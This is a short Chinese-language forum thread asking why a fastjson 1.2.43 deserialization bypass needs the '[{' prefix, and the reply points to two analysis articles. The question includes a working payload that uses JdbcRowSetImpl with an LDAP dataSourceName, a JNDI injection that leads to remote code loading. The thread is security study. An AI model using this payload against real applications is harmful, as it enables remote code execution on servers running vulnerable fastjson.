请问关于fastjson1.2.43版本下的绕过payload有没有深度解析？

[Bertram-demo]

在1.2.43版本下，使用了如下的payload绕过：
{
"@type":"[com.sun.rowset.JdbcRowSetImpl"[{
"dataSourceName":"ldap://xxx",
"autoCommit":true
}
只有添加"[{"才不会报错并且触发漏洞，请问是否了解具体原因，我看好多篇解析都没说到这个问题，不知道是不是我的查找方向错了

[W01fh4cker]

https://blog.gm7.org/%E4%B8%AA%E4%BA%BA%E7%9F%A5%E8%AF%86%E5%BA%93/02.%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/01.java%E5%AE%89%E5%85%A8/03.%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/04.fastjson%E5%90%84%E7%89%88%E6%9C%AC%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90#fastjson-1243

https://xz.aliyun.com/t/9052#toc-7

可以参考这两篇文章多调试学习，仔细调试代码就可以发现，答案就在代码中。